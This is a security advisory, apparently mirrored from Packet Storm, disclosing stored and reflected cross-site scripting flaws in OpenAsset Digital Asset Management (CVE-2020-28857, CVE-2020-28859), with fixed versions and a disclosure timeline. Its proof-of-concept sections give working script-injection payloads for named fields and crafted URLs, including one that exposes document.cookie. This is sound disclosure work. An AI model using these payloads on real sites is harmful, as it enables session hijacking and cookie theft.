Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJack MisiuraPACKETSTORM:160455
HistoryDec 11, 2020 - 12:00 a.m.

OpenAsset Digital Asset Management Cross Site Scripting

2020-12-1100:00:00
Jack Misiura
packetstormsecurity.com
489
openasset digital asset management
xss
cross-site scripting
stored
reflected
vulnerability
remote attackers
javascript
html
patch
cve-2020-28857
cve-2020-28859
the missing link
disclosed
patches

EPSS

0.004

Percentile

73.0%

JSON
`Title: Stored cross-site scripting (XSS)  
Product: OpenAsset Digital Asset Management by OpenAsset  
Vendor Homepage: https://www.openasset.com/  
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)  
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)  
CVE Number: CVE-2020-28857  
  
Author: Jack Misiura from The Missing Link   
Website: https://www.themissinglink.com.au  
  
  
Timeline:  
2020-11-14 Disclosed to Vendor  
2020-12-04 Vendor releases final patches  
2020-12-10 Publication  
  
  
  
1. Vulnerability Description  
  
The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:  
  
* System Preferences  
  
* Project Code regex field  
  
* User name regex field  
  
* Password regex field  
  
* All three description fields  
  
* First Album Name field  
  
* Visit Items Per SOAP request field  
  
* Categories description  
  
* Keywords, triggered on deletion attempts  
  
* Editing photographer name  
  
* Access token name  
  
* Web share name  
  
  
  
2. PoC  
  
  
  
For system preferences fields, the following payloads can be used:  
  
  
  
" autofocus onfocus="alert('Stored XSS');" abc="  
  
"><script>alert("Script stored XSS");</script>  
  
  
  
For categories description:  
  
  
  
Category Name Goes Here<script>alert('Description stored XSS');</script>  
  
  
  
For keywords:  
  
  
  
Delete Me<script>alert(1234);</script>  
  
  
  
Photographer name:  
  
  
  
John Smith<script>alert("XSS Attack!");</script>  
  
  
  
Access token name:  
  
  
  
TokenName"><script>alert("Stored XSS Tokens")</script>  
  
  
  
Web share name:  
  
  
  
Share<script>alert("Stored XSS Web Share Name");</script>  
  
  
  
3. Solution  
  
  
  
The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.  
  
  
  
4. Advisory URL  
  
  
  
https://www.themissinglink.com.au/security-advisories  
  
  
  
--------  
  
Title: Reflected cross-site scripting (XSS)  
Product: OpenAsset Digital Asset Management by OpenAsset  
Vendor Homepage: https://www.openasset.com/  
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)  
Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)  
CVE Number: CVE-2020-28859  
  
Author: Jack Misiura from The Missing Link   
Website: https://www.themissinglink.com.au  
  
Timeline:  
2020-11-14 Disclosed to Vendor  
2020-12-04 Vendor releases final patches  
2020-12-10 Publication  
  
  
1. Vulnerability Description  
  
  
  
Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows remote attackers to inject arbitrary JavaScript or HTML via:  
  
* Account recovery/password reset page through the email parameter  
  
* Saved search request, through the id parameter  
  
* Search result request, through both the imageViewId and lpFilterInputId parameters  
  
  
  
2. PoC  
  
  
  
Account recovery:  
  
https://example.com/Page/StartAccountRecovery?ok=1 <https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test%3cscript%3ealert(document.cookie)%3c%2Fscript%3e.com> &email=test%40test<script>alert(document.cookie)<%2Fscript>.com  
  
  
  
Saved search request:  
  
https://example.com/AJAXPage/SavedSearch?id=167826 <https://example.com/AJAXPage/SavedSearch?id=167826%22')%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script> "')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>  
  
"');}}}]});alert(123);  
  
  
  
Search result request:  
  
https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript <https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert(%22more+xss+here%22)%3b%3c/script> >alert("more+xss+here")%3b</script>  
  
  
  
3. Solution  
  
  
  
The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.  
  
  
  
4. Advisory URL  
  
  
  
https://www.themissinglink.com.au/security-advisories  
  
`

Related

cve 2
prion 2
cvelist 2
nvd 2
cve
cve
CVE-2020-28857
2020-12-14 19:15:12
CVE-2020-28859
2020-12-14 19:15:12
prion
prion
Cross site scripting
2020-12-14 19:15:00
Cross site scripting
2020-12-14 19:15:00
cvelist
cvelist
CVE-2020-28857
2020-12-14 18:53:18
CVE-2020-28859
2020-12-14 19:01:59
nvd
nvd
CVE-2020-28857
2020-12-14 19:15:12
CVE-2020-28859
2020-12-14 19:15:12

EPSS

0.004

Percentile

73.0%

JSON
Related for PACKETSTORM:160455
cve2prion2cvelist2nvd2